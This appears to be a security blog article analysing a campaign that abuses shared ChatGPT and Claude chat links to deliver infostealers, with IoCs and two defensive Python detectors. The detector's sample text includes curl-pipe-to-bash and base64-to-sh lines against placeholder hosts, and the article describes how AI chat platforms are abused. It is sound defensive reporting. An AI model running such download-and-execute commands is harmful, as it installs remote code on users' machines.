In the rapidly evolving landscape of 2026, threat actors have found a sophisticated new method to bypass traditional security perimeters: abusing the very AI tools that organizations have come to trust. A recently uncovered campaign, dubbed LLMShare by researchers at Push Security, demonstrates a high-fidelity execution of “legitimate platform abuse.” By weaponizing the content-sharing features of ChatGPT and Claude, attackers are delivering malware through trusted domains that bypass URL reputation filters, secure web gateways, and even the natural skepticism of seasoned users.
Architectural Vulnerability: Exploiting Domain Reputation
The core of the LLMShare campaign lies in its exploitation of structural trust. Traditional cybersecurity defenses rely heavily on domain reputation and categorization. When a user clicks a link, security tools check if the domain is known for hosting malicious content. Because chatgpt.com and claude.ai are legitimate, high-authority domains, any link originating from them—including shared chat sessions—is flagged as “safe” by default.
Attackers are capitalizing on this “reputation shield” to host their initial staging ground. By using the /s/ (shared) URL path on OpenAI’s domain, the threat actors ensure that their malicious lures are served from 100% legitimate infrastructure. This method effectively blinds standard automated scanners and safe-browsing databases, which are programmed not to block core AI productivity platforms.

The ChatGPT Variant: Precision Rendering and Social Engineering
The ChatGPT branch of this campaign marks a significant technical leap from previous “ClickFix” or “InstallFix” attacks. Rather than merely presenting a conversation history containing a malicious command, the attackers utilize ChatGPT’s code-rendering capabilities to build a fully designed, self-contained web page within the chat interface.
Using custom HTML and CSS injected into a chat session, the attackers simulate a “service disruption” notice. The page informs the user that the web version of ChatGPT is currently experiencing high traffic and suggests downloading the “official” desktop application to continue. This call to action is highly effective because it provides a plausible solution to a common user frustration. When the user clicks the download button, they are redirected to a secondary site—often a convincing clone of the OpenAI download portal—which delivers macOS or Windows payloads. These payloads frequently contain sophisticated infostealers designed to harvest credentials and session tokens directly from the user’s browser.
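Because the lure's domain is trusted, the detectable signal is the sequence: a shared-chat visit followed shortly by an installer download from an unrelated host. The sketch below is an added example, not code from Push Security or from this article; the vendor host list, the 300-second window, the log tuple format and all sample events are assumptions constructed for illustration.

```python
from urllib.parse import urlsplit

# Shared-chat path prefixes, as seen in the article's indicator URLs.
SHARE_PREFIXES = {"chatgpt.com": "/s/", "claude.ai": "/share/"}
# Assumption: hosts this organisation accepts installers from; maintain your own list.
VENDOR_HOSTS = {"openai.com", "chatgpt.com", "anthropic.com", "claude.ai"}
INSTALLER_EXT = (".dmg", ".pkg", ".exe", ".msi")
WINDOW_SECONDS = 300  # assumed correlation window

def is_shared_chat(url):
    parts = urlsplit(url)
    prefix = SHARE_PREFIXES.get(parts.hostname or "")
    return prefix is not None and parts.path.startswith(prefix)

def is_vendor(host):
    return any(host == v or host.endswith("." + v) for v in VENDOR_HOSTS)

def correlate(events):
    """events: time-ordered (epoch_seconds, user, url) tuples from proxy logs.
    Alert when a user fetches an installer from a non-vendor host shortly
    after opening a shared chat, regardless of either domain's reputation."""
    last_share, alerts = {}, []
    for ts, user, url in events:
        parts = urlsplit(url)
        if is_shared_chat(url):
            last_share[user] = (ts, url)
            continue
        seen = last_share.get(user)
        if (seen and ts - seen[0] <= WINDOW_SECONDS
                and parts.path.lower().endswith(INSTALLER_EXT)
                and not is_vendor(parts.hostname or "")):
            alerts.append((user, seen[1], url))
    return alerts

# Constructed sample events (placeholder IDs and .invalid hosts, not real indicators).
EVENTS = [
    (1000, "alice", "https://chatgpt.com/s/EXAMPLE-ID"),
    (1040, "alice", "https://get-desktop.example.invalid/ChatGPT-Setup.dmg"),
    (1100, "bob", "https://chatgpt.com/c/EXAMPLE-PRIVATE"),
    (1130, "bob", "https://tools.example.invalid/viewer.exe"),
    (2000, "carol", "https://claude.ai/share/EXAMPLE-ID"),
    (2900, "carol", "https://get-desktop.example.invalid/Claude.pkg"),
]

if __name__ == "__main__":
    for alert in correlate(EVENTS):
        print(alert)
```

Only alice's download alerts: bob never opened a shared chat, and carol's download falls outside the window.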

The Claude Variant: Targeted Malware via Terminal Commands
Simultaneously, Push Security detected a parallel variant targeting the Claude.ai ecosystem. In this scenario, the social engineering is tailored toward developers and power users. A shared Claude conversation is disguised as an “Apple Support” guide for installing “Claude Code” on Mac.
The chat provides a seemingly helpful curl command that the user is instructed to copy and paste into their terminal. For users who have grown accustomed to AI assisting with technical workflows, this feels like a natural extension of the tool’s utility. However, the command is a “one-liner” designed to download and execute a malicious script in the background. The fact that both ChatGPT and Claude variants are surfacing in the same timeframe suggests a unified “playbook” among threat actors, who are testing different platforms to see which social engineering hooks yield the highest conversion rates.
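A defender can screen shared-chat text, pasted commands or shell history for the download-and-execute shape described above before anything reaches a terminal. The following is an added example, not code from the article or from Push Security; the rule set is an assumed heuristic (the article does not quote the campaign's actual command) and the sample text is constructed with placeholder hosts.

```python
import re

# Assumed heuristic rules for download-and-execute shell one-liners.
# They match the general shape only and will miss obfuscated variants.
FETCH = r"(?:curl|wget)\b[^|\n]*"
SHELL = r"(?:sudo\s+)?(?:ba|z|da|k)?sh\b"
RULES = {
    # curl ... | bash
    "pipe_to_shell": re.compile(FETCH + r"\|\s*" + SHELL, re.I),
    # bash -c "$(curl ...)", sh <(curl ...)
    "shell_substitution": re.compile(
        SHELL + r"\s+(?:-c\s+)?[\"']?(?:\$\(|`|<\()\s*" + FETCH, re.I),
    # ... | base64 --decode | sh
    "decode_to_shell": re.compile(
        r"base64\s+(?:-d|--decode)\b[^|\n]*\|\s*" + SHELL, re.I),
    # curl -o f ... && chmod +x f
    "fetch_chmod_run": re.compile(FETCH + r"(?:&&|;)\s*chmod\s+\+x\b", re.I),
}

def flag_one_liners(text):
    """Return (line_number, rule_name) for every suspicious line in text."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        for name, rx in RULES.items():
            if rx.search(line):
                hits.append((n, name))
    return hits

# Constructed sample: text as it might appear in a shared "install guide".
SAMPLE = """\
To install, open Terminal and paste:
curl -fsSL https://downloads.example.invalid/install.sh | bash
/bin/bash -c "$(curl -fsSL https://downloads.example.invalid/setup)"
echo PLACEHOLDER | base64 --decode | sh
curl -O https://downloads.example.invalid/notes.tar.gz
"""

if __name__ == "__main__":
    for line_no, rule in flag_one_liners(SAMPLE):
        print(f"line {line_no}: {rule}")
```

The plain download on the last sample line is not flagged, since fetching a file without executing it is not the pattern of interest.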
Evasion Techniques: Cloaking and Sandbox Detection
Beyond the initial delivery, the LLMShare campaign employs advanced evasion techniques to avoid detection by security researchers. The secondary download sites often utilize “cloaking”—a technique where the server inspects the visitor’s IP and user-agent. If the visitor is identified as an automated scanner or a security researcher (e.g., from a known data center IP), the site serves a benign, unrelated page, such as a generic corporate site. Only real users coming from residential or business ISPs are shown the malware download page.
Furthermore, analysis of the Windows payloads has revealed built-in logic to detect virtualized environments. If the malware determines it is running inside a sandbox or a VM—standard tools for security analysts—it ceases all malicious activity to remain “clean” in reporting. This multi-layered approach to stealth makes the LLMShare campaign a persistent threat that can remain active for extended periods before being flagged.
Technical Indicators of Compromise (IoCs)
While the domains and files rotate quickly, the following indicators were observed during the initial discovery. Security teams should monitor for traffic to these specific shared links and the associated secondary domains.
| Indicator | Type | Note |
| --- | --- | --- |
| hxxps://claude[.]ai/share/8e6401b5-4849-46c4-a3cb-29e1c3c49131 | URL | Maliciously crafted shared Claude chat |
| hxxps://chatgpt[.]com/s/cb_6a0f1e6bbec88191aa7fede27163f08d | URL | Rendered “Service Disruption” page |
| openew[.]app | Domain | Primary redirect for the fake installer |
| de8c50e8ccd240ef9d10ec26c26eeb37a4d1cad7c1e0edf3bb6e5689ec2dde78 | SHA256 | Hash of the malicious “ChatGPT for Desktop” installer |
Our Opinion: The Death of “URL Reputation” as a Security Metric
The LLMShare campaign is a masterclass in Legitimate Platform Abuse. By living on chatgpt.com, these attackers have effectively turned a “Trusted Domain” into a Trojan Horse.
In our view, this signals a critical failure in traditional, static security models. If your security posture relies on “allow-listing” major SaaS platforms (like OpenAI, Microsoft 365, or Google Cloud), you are essentially blind to this entire class of attack. We are moving toward a reality where the reputation of the platform no longer guarantees the safety of the content hosted on it.
Organizations must shift from “Domain-Based” security to “Behavioral-Based” security. It is no longer enough to know where a user is going; you must inspect what the page is doing and what it is asking the user to run. As AI-native threats become the norm, the browser must become the new perimeter, equipped with real-time telemetry that can identify and block malicious intent—even when it arrives on a “trusted” domain.
